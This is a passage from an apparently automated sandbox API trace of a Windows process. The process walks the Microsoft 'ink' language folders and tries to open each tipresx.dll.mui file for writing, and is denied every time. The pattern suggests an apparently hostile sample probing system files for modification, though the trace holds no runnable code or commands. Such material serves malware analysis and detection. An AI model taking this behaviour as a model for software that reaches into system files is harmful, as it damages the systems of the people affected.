| out: hHeap=0x20000) returned 1 [0085.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.935] AreFileApisANSI () returned 1 [0085.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0085.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0085.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0085.935] AreFileApisANSI () returned 1 [0085.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0085.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui") returned 73 [0085.935] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.935] GetFileType (hFile=0x348) returned 0x1 [0085.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0085.936] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.936] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.936] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.936] CloseHandle (hObject=0x348) returned 1 [0085.936] AreFileApisANSI () returned 1 [0085.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85080 [0085.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x85080, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui") returned 73 [0085.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.937] GetLastError () returned 0x5 [0085.937] GetLastError () returned 0x5 [0085.937] SetLastError (dwErrCode=0x5) [0085.937] GetLastError () returned 0x5 [0085.937] SetLastError (dwErrCode=0x5) [0085.937] GetLastError () returned 0x5 [0085.937] SetLastError (dwErrCode=0x5) [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85080 | out: hHeap=0x20000) returned 1 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0085.937] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.937] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.937] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0085.937] FindClose (in: hFindFile=0x78950 | out: hFindFile=0x78950) returned 1 [0085.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0085.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0085.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0085.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0085.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0085.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0085.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0085.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.938] AreFileApisANSI () returned 1 [0085.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA", lpUsedDefaultChar=0x0) returned 57 [0085.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0085.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0085.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.938] AreFileApisANSI () returned 1 [0085.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0085.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA") returned 57 [0085.938] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.939] GetLastError () returned 0x5 [0085.939] GetLastError () returned 0x5 [0085.939] SetLastError (dwErrCode=0x5) [0085.939] GetLastError () returned 0x5 [0085.939] SetLastError (dwErrCode=0x5) [0085.939] GetLastError () returned 0x5 [0085.939] SetLastError (dwErrCode=0x5) [0085.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.939] AreFileApisANSI () returned 1 [0085.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0085.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA") returned 57 [0085.939] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.939] GetLastError () returned 0x5 [0085.939] GetLastError () returned 0x5 [0085.939] SetLastError (dwErrCode=0x5) [0085.939] GetLastError () returned 0x5 [0085.939] SetLastError (dwErrCode=0x5) [0085.939] GetLastError () returned 0x5 [0085.939] SetLastError (dwErrCode=0x5) [0085.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0085.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.940] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.940] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0085.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0085.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0085.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0085.940] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0085.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0085.940] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78e50 [0085.948] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.948] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0085.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0085.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0085.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0085.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0085.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.949] AreFileApisANSI () returned 1 [0085.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0085.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0085.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0085.949] AreFileApisANSI () returned 1 [0085.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85c60 [0085.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui") returned 73 [0085.949] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.950] GetFileType (hFile=0x348) returned 0x1 [0085.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0085.950] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.950] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.950] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.950] CloseHandle (hObject=0x348) returned 1 [0085.951] AreFileApisANSI () returned 1 [0085.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85080 [0085.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x85080, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui") returned 73 [0085.951] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.951] GetLastError () returned 0x5 [0085.951] GetLastError () returned 0x5 [0085.951] SetLastError (dwErrCode=0x5) [0085.951] GetLastError () returned 0x5 [0085.951] SetLastError (dwErrCode=0x5) [0085.951] GetLastError () returned 0x5 [0085.951] SetLastError (dwErrCode=0x5) [0085.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85080 | out: hHeap=0x20000) returned 1 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0085.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.952] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0085.952] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0085.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0085.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0085.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.952] HeapFree (in: hHeap=0x20000, 